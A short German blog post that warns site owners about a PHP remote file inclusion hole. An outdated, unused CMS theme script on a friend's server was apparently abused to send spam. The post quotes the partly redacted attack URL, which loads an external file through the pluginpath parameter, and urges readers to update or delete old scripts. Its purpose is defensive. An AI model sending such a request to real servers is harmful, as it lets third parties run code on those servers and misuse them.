Lücken in alten oder veralteten Scripts können zum Versenden von Spam durch Dritte unter eurer Domain verwendet werden – so geschehen vor ein paar Tagen bei Nils.

Die betreffende Datei war Teil eines CMS-Themes und wurde zwischenzeitlich sicher von den Machern geupdatet, lag aber eben noch (eigentlich ungenutzt) in einer alten Version auf dem Server. Mit [...]/advanced2.php?pluginpath[0]=http://www.[...].net/mega/info.txt? wurde eine externe Datei eingebunden, also eine klassische PHP Remote File Include Vulnerability.
Also unbedingt dafür sorgen dass eure Scripte auf dem aktuellsten Stand sind oder ihr ungenutzte alte Sachen löscht – auch wenn das Arbeit macht – denn ihr haftet dafür was auf euren Servern passiert.